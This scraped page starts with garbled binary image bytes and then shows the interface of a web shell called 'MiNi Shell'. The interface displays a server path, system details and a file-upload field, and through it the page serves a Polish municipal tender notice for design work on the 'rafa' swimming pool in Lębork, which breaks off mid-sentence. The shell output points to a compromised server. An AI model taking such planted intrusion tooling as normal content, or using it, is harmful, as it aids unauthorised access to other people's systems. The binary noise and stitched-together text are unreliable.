JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250714/0032409001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowo-kosztorysowej budowy pływalni miejskiej &#34;rafa&#34; w Lęborku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Lębork</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979737</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lębork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@um.lebork.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lebork.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowo-kosztorysowej budowy pływalni miejskiej &#34;rafa&#34; w Lęborku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-93fbdb97-472f-4f0d-bdb5-175f9da61599</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00324090</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umlebork.ezamawiajacy.pl/pn/UMLEBORK/demand/notice/publicpzp/during/list?USER_MENU_HOVER=publicpzpDuringNoticePublicList <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umlebork.ezamawiajacy.pl/pn/UMLEBORK/demand/notice/publicpzp/during/list?USER_MENU_HOVER=publicpzpDuringNoticePublicList</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Porozumiewanie się Zamawiającego<br/>z Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy eZamawiający Urzędu Miasta Lębork<br/>https://umlebork.ezamawiajacy.pl/servlet/HomeServlet. Istnieje możliwość kierowania zapytania za pomocą środków komunikacji<br/>elektronicznej – e-mail: inwestycje@um.lebork.pl – z zastrzeżeniem wymogów odnośnie poszczególnych oświadczeń i dokumentów<br/>określonych w niniejszej SWZ.<br/>2. Zaleca się aby Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, posiadał konto na<br/>platformie eZamawiający Urzędu Miasta Lębork.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy użyciu platformy<br/>eZamawiający opisane zostały w instrukcji dla Wykonawcy dostępnej pod adresem:<br/>https://umlebork.ezamawiajacy.pl/servlet/HomeServlet?<br/>MP_action=publicFilesList&amp;folder=002c&amp;clientName=UMLEBORK&amp;MP_module=main<br/>4. Za datę przekazania oferty, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji,<br/>oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na platformę eZamawiający.<br/>5. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: inwestycje@um.lebork.pl.<br/>6. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem platformy eZamawiający jako załączniki. Sposób sporządzania dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych ) (Dz. Urz. UE<br/>L 119 z 04.05.2016 r., str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1.1. administratorem danych osobowych jest Urząd Miejski w Lęborku, ul. Armii Krajowej 14, 84 300 Lębork, tel. 59 8624 280;<br/>1.2. inspektorem ochrony danych osobowych w Urzędzie Miejskim w Lęborku jest pani Bożena Steciuk, e-mail: iod@um.lebork.pl,<br/>tel. 59 8637 733;<br/>1.3. dane osobowe przekazane przez Wykonawcę przetwarzane będą na podstawie art. 6 ust. 1 lit c RODO w celu związanym z<br/>niniejszym postępowaniem o udzielenie zamówienia publicznego na Wykonanie dokumentacji projektowo-kosztorysowej nowego<br/>obiektu mostowego przez rz. Okalica w ciągu ul. Staszica w Lęborku, prowadzonym w trybie podstawowym bez przeprowadzenia<br/>negocjacji na podst. art. 275 pkt.1.<br/>1.4. odbiorcami danych osobowych przekazanych przez Wykonawcę będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych z dnia 11.09.2019 r.(tj. z 2024 r.<br/>poz. 1320 z późn. zm), dalej Ustawa Pzp;<br/>1.5. dane osobowe przekazane przez Wykonawcę będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 5 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia;<br/>1.6. obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>1.7. w odniesieniu do danych osobowych przekazanych przez Wykonawcę decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>1.8. Wykonawca posiada:<br/>1.8.1. na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>1.8.2. na podstawie art. 16 RODO prawo do sprostowania danych osobowych Wykonawcy;<br/>1.8.3. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>1.8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie danych<br/>osobowych dotyczących Wykonawcy narusza przepisy RODO;<br/>1.9. Wykonawcy nie przysługuje:<br/>1..9.1. w związku z art. 17 ust. 3 lit. b d lub e RODO prawo do usunięcia danych osobowych;<br/>1.9.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>1.9.3. na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.Z.23.2025.P</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej dla zadania pn.: „Budowa/rozbudowa pływalni miejskiej w Lęborku” wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę.<br/><br/>1.	Zakres zamówienia obejmować będzie :<br/>1.1. Wykonanie inwentaryzacji istniejącego obiektu budowlanego – budynku pływalni oraz wszystkich zespołów funkcjonalnych;<br/>1.2.	Wykonanie inwentaryzacji istniejącego drzewostanu, uzbrojenia terenu oraz określenie ewentualnych kolizji z innymi obiektami zlokalizowanymi na terenie planowanej inwestycji; <br/>1.3.	Uzyskanie mapy sytuacyjno - wysokościowej do celów projektowych (kopię należy przekazać Zamawiającemu); <br/>1.4.	Wykonanie wielobranżowej koncepcji w min. 2 wariantach:<br/>1.4.1. rozbudowa istniejącego obiektu z zastosowaniem nowej technologii basenowej zarówno w nowej części pływalni jaki i w istniejącym budynku,<br/>1.4.2. budowa całkowicie nowego basenu,<br/>koncepcje mają być zróżnicowane pod kątem przyjętych rozwiązań technologicznych i funkcjonalnych, opracowane koncepcje powinny zawierać zestawienie kosztów i korzyści dla każdego przyjętego wariantu. Dla w/w projektów koncepcyjnych należy przedstawić szacunkowe koszty przyjętych rozwiązań (wszystkich wydatków związanych z planowaną budową) wraz z kosztami eksploatacji w przestrzeni 5 lat i na tej podstawie porównać warianty budowy pływalni. Rozwiązania koncepcyjne winny zawierać część graficzną i opisową, obejmujące rozwiązania architektoniczno – konstrukcyjne (rzuty kondygnacji z układem funkcjonalnym pomieszczeń, ich przeznaczeniem, wielkością powierzchni, charakterystyczne przekroje, rysunki elewacji projekt zagospodarowania terenu, wizualizację obiektu).<br/>Dodatkowo w ramach koncepcji należy sporządzić analizę opłacalności zastosowania rozwiązań technicznych, które umożliwią wykorzystanie na potrzeby basenu alternatywnych źródeł energii elektrycznej i cieplnej, a wskazane opłacalne rozwiązania (wskazane w koncepcji ostatecznej, uzgodnionej ze wszystkimi stronami) zawarte zostaną w dokumentacji projektowej.<br/>Przyjęte rozwiązania winny być nastawione na optymalizację kosztów realizacji inwestycji oraz minimalizację kosztów eksploatacji, jednocześnie winny być nowoczesne i zgodne z obowiązującymi standardami, przepisami prawa i wytycznymi oraz o wysokim poziomie niezawodności.<br/>1.5.	Określenie zakresu niezbędnych do wykonania robót remontowych w przypadku wyboru wariantu przewidującego rozbudowę istniejącego obiektu;<br/>1.6.	Wykonanie projektu rozbiórki istniejącego obiektu – pływalni miejskiej (w przypadku wyboru wariantu budowy całkowicie nowego basenu) oraz uzyskaniem wszystkich decyzji i pozwoleń niezbędnych do dokonania rozbiórki istniejącego obiektu;<br/>1.7.	Wykonanie wielobranżowego projektu budowlanego obejmującym zakres o którym mowa w art. 34 ustawy z dnia 7 lipca 1994 r. Prawo budowlane;<br/>1.8.	Wykonanie wielobranżowych: projektu wykonawczego, przedmiaru robót, STWiORB, oraz informacji dotyczącej bezpieczeństwa i ochrony zdrowia w zakresie zgodnym z treścią Rozporządzenia Ministra Rozwoju i Technologii z dnia 20 grudnia 2021r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego;<br/>1.9.	Wykonanie projektów usunięcia kolizji z istniejącymi sieciami wraz z uzyskaniem warunków technicznych (lokalizację istniejących sieci uzbrojenia terenu pokazano na mapach stanowiących Załącznik nr 10 do SWZ);<br/>1.10.	Wykonanie projektu tymczasowej organizacji ruchu na czas budowy, jeśli będzie niezbędna;<br/>1.11.	Wykonanie projektu docelowej organizacji ruchu wraz z jej zatwierdzeniem przez właściwy organ, jeśli będzie niezbędna;<br/>1.12.	Opracowanie kosztorysów inwestorskich (dla każdej branży);<br/>1.13.	Uzyskanie zezwolenia na wycinkę drzew kolidujących z projektowanym przedsięwzięciem;<br/>1.14.	Opracowanie dokumentacji geotechnicznej i uwzględnienie wniosków z przeprowadzonych badań w wykonywanej dokumentacji projektowo-kosztorysowej;<br/>1.15.	Należy uzyskać decyzje, opinie, sprawdzenia, warunki uzgodnienia i zatwierdzenia dokumentacji projektowej wymagane przepisami prawa w tym wynikające z ochrony środowiska, uzgodnienia z Zamawiającym, uzgodnienie projektu z gestorami sieci i innych wymaganych do uzyskania pozwolenia na budowę, które Wykonawca ma obowiązek przekazywać Zamawiającemu w terminie do 7 dni od ich uzyskania;<br/>1.16.	Opracowanie odpowiedzi na ewentualne pytania Wykonawców na etapie postępowania o udzielenie zamówienia publicznego na roboty objęte dokumentacją będącą przedmiotem niniejszego zamówienia, bez odrębnej umowy i wynagrodzenia, na pisemne wezwanie Zamawiającego.<br/>UWAGA: Zamawiający wymaga aby dokumentacja projektowa objęta niniejszym zamówieniem publicznym była sporządzona zgodnie z przepisami Międzynarodowej Federacji Pływackiej (FINA) dotyczącymi obiektów sportowych, określającymi minimalne standardy pływalni FINA (o których mowa w dziale FR 1. Uwagi ogólne, pkt. FR. 1.3. Minimalne standardy pływalni FINA), aktualnymi na dzień sporządzania dokumentacji projektowej. W przypadku gdyby w/w przepisy utraciły aktualność i zostały zastąpione innymi, wówczas należy poinformować o tym fakcie Zamawiającego a w przypadku rozbieżności pomiędzy w/w przepisami a tymi które je zastąpiły, konieczne jest uzgodnienie z Zamawiającymi zmian wynikających z nowych przepisów.<br/>2.	Zestawienie powierzchni poszczególnych części zagospodarowania w liniach rozgraniczających teren inwestycji:<br/>2.1. powierzchnia terenu objętego opracowaniem – ca 6 830m2;<br/>2.2. powierzchnia istniejącej zabudowy – ca 1 700 m2;<br/>2.3. powierzchnia nowej (planowanej) zabudowy – ca 4 000 m2.<br/><br/>3.	Realizacja zamówienia ma obejmować: <br/>3.1.	Opracowanie wielobranżowej koncepcji w 2 wariantach (plus wersja elektroniczna na nośniku pendrive w ogólnie dostępnym formacie .pdf i .dwg);<br/>3.2.	opracowanie dokumentacji projektowej w tym:<br/>3.2.1.	wielobranżowy projekt budowlany w zakresie uwzględniającym specyfikę robót budowlanych – w 5 egz. (plus wersja elektroniczna na nośniku pendrive w ogólnie dostępnym formacie .pdf i .dwg );<br/>3.2.2.	wielobranżowy projekt wykonawczy (w tym także usunięcie kolizji) – w 4 egz. (plus wersja elektroniczna na nośniku pendrive w ogólnie dostępnym formacie .pdf i .dwg);<br/>3.2.3.	wielobranżowy przedmiar robót – w 4 egz. (plus wersja elektroniczna na nośniku pendrive w ogólnie dostępnym formacie .pdf i .dwg);<br/>3.2.4.	wielobranżową specyfikację techniczną wykonania i odbioru robót budowlanych – w 4 egz. (plus wersja elektroniczna na nośniku pendrive w ogólnie dostępnym formacie .pdf i .dwg);<br/>3.2.5.	wielobranżowy kosztorys inwestorski – w 4 egz. (plus wersja elektroniczna na nośniku pendrive w ogólnie dostępnym formacie .pdf i .dwg);<br/>3.2.6.	dokumentację geotechniczną badań podłoża gruntowego – w 4 egz. (plus wersja elektroniczna na nośniku pendrive w ogólnie dostępnym formacie);<br/>3.2.7.	informację dotyczącą bezpieczeństwa i ochrony zdrowia, w przypadkach gdy ich opracowanie jest wymagane – w 4 egzemplarzach (plus wersja elektroniczna na nośniku pendrive w ogólnie dostępnym formacie .pdf i .dwg).<br/>3.2.8.	charakterystykę energetyczną obiektu w 4 egzemplarzach (plus wersja elektroniczna na nośniku pendrive w ogólnie dostępnym formacie .pdf i .dwg).<br/>3.3.	uzyskanie decyzji pozwolenia na budowę wraz z klauzulą ostateczności decyzji.<br/>3.4.	wymagania Zamawiającego dotyczące architektury:<br/>3.4.1.	bryłę obiektu należy wkomponować w otoczenie oraz zachować zgodność z zapisami w obowiązującym MPZP.<br/>3.4.2.	zalecany jest obiekt dwukondygnacyjny (ostateczna decyzja po wyborze wariantu koncepcji), w całości dostępny dla osób niepełnosprawnych.<br/>3.4.3.	WC ogólnodostępne z wejściem z korytarza głównego/hallu - przystosowane dla osób niepełnosprawnych.<br/>3.4.4.	zastosowane materiały o odpowiedniej odporności ogniowej.<br/>3.4.5.	zastosować rozwiązania spełniające normy techniczno – budowlane, przeciwpożarowe i higieniczne, uzgodnione z rzeczoznawcą ds. sanitarno-higienicznych, p.poż., BHP. Uzgodnienie rozwiązań projektowych z rzeczoznawcą p.poż. winno być przeprowadzone w pełnym zakresie, tj.: instalacje elektryczne łącznie ze schematem tablicy głównej, schematu PWP, instalacji oświetlenia ewakuacyjnego, SSP i oddymiania oraz projektu sanitarnego w zakresie hydrantów wewnętrznych i zewnętrznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71244000-0 - Kalkulacja kosztów, monitoring kosztów</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">27 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający przy wyborze najkorzystniejszej oferty posługiwać się będzie następującymi kryteriami:<br/>a. Kryterium „Cena oferty” (C) - waga kryterium 60%<br/>Przyjmuje się, że oferta z najniższą ceną otrzyma 60 pkt.<br/>cena najniższa<br/>C = ----------------------------------------- x 60 pkt<br/>cena danego Wykonawcy<br/>b. Kryterium „Doświadczenie projektanta w specjalności konstrukcyjno-budowlanej” (D) - waga kryterium 40%<br/>Przyjmuje się, że Wykonawca w ramach kryterium „Doświadczenie projektanta w specjalności konstrukcyjno-budowlanej” może uzyskać maksymalnie 40 pkt.<br/>W kryterium „Doświadczenia projektanta w specjalności konstrukcyjno-budowlanej”, Zamawiający przyzna punkty jeżeli: Wykonawca wykaże, że skieruje do realizacji zamówienia publicznego osobę, która obejmie funkcję Projektanta w specjalności konstrukcyjno-budowlanej, posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej,<br/>która opracowała:<br/>• 1 projekt budowy*/przebudowy** minimum jednego budynku przeznaczonego na potrzeby sportu lub rekreacji, pełniącego funkcję<br/>pływalni*** o kubaturze co najmniej 8 000 m3 – oferta Wykonawcy otrzyma 0 pkt.<br/>• 2 projekty budowy*/przebudowy** minimum jednego budynku przeznaczonego na potrzeby sportu lub rekreacji, pełniącego funkcję pływalni***o kubaturze co najmniej 8 000 m3 - oferta Wykonawcy otrzyma 20 pkt.<br/>• 3 projekty i więcej budowy*/przebudowy** minimum jednego budynku przeznaczonego na potrzeby sportu lub rekreacji, pełniącego funkcję pływalni*** o kubaturze co najmniej 8 000 m3 - oferta Wykonawcy otrzyma 40 pkt.<br/>w ciągu ostatnich 5 lat licząc od dnia wyznaczonego na składanie ofert (liczy się dzień przekazania kompletnej dokumentacji podmiotowi na rzecz którego została opracowana odpowiednia dokumentacja).<br/>UWAGA: Nie dopuszcza się wskazania doświadczenia zawodowego innej osoby niż ta która będzie wskazana w Załączniku nr 3b do SWZ (o którym mowa w rozdz. V ust. 1 pkt 1.2. SWZ), składanym w celu potwierdzenia spełniania warunku udziału w postępowaniu. Wykazanie innej osoby w formularzu Ofertowym niż w Wykazie osób skutkować będzie odrzuceniem oferty na podst. art. 226 ust. 1 pkt. 5 ustawy Pzp (Zamawiający odrzuca ofertę jeżeli jej treść jest niezgodna z warunkami zamówienia).<br/>Jeżeli Wykonawca w Formularzu Ofertowym nie wskaże żadnego doświadczenia zgodnie z ww. kryterium oceny ofert, wówczas otrzyma 0 pkt. w przedmiotowym kryterium.<br/>Jeżeli Wykonawca w Formularzu Ofertowym wskaże doświadczenia przekraczające liczbę dokumentacji za które Zamawiający przyznaje punktację ( tj. powyżej 3 projektów), wówczas otrzyma 40 pkt. w przedmiotowym kryterium.<br/>2. Łączna punktacja oferty = suma punktów (C + D)<br/>gdzie:<br/>C – liczba punktów jaką może zdobyć oferta (Wykonawca) za kryterium „Cena”<br/>D – liczba punktów jaką może zdobyć oferta (Wykonawca) 